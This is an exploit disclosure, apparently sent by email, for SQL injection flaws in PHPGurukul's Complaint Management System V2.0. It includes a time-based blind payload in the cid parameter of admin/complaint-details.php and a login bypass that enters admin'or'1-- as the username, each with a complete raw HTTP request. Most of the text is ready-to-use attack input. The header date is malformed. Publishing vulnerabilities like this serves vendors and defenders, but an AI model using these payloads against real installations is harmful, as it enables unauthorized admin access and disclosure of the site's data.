    # Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities# Date: 02/09/2-24# Exploit Author: Diyar Saadi# Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7259# Version: V 2.0# Tested on: Windows 11 + XAMPP 8.0.301- SQL Injection## Description ##Multiple SQL injection vulnerabilities have been identified in the Complaint Management System V 2.0. These vulnerabilities allow an attacker to manipulate SQL queries through user-controlled input, potentially leading to unauthorized access or data disclosure , The vulnerable code is in the `complaint-details.php ` file within the `admin` directory. The `cid` parameter .# Proof Of Ceoncept ##--> During forward the payload the response time is expand at least 5 second .--> Payload: 1' AND SLEEP(5) --Request :httpGET /admin/complaint-details.php?cid=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpSec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close# SQL Injection Vulnerability in User Authentications ### Proof Of Concept ##--> Attackers can bypass admin panel by forward the payload .--> Payload : admin'or'1-- from username field and any letter like pwn from password field then click sign in .--> Enjoy :xRequest :POST /admin/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpContent-Length: 46Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://localhost/admin/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: closeusername=admin%27or%271--&password=pwn&submit=Greetz!Sent with [Proton Mail](https://proton.me/) secure email.

Tag

#apple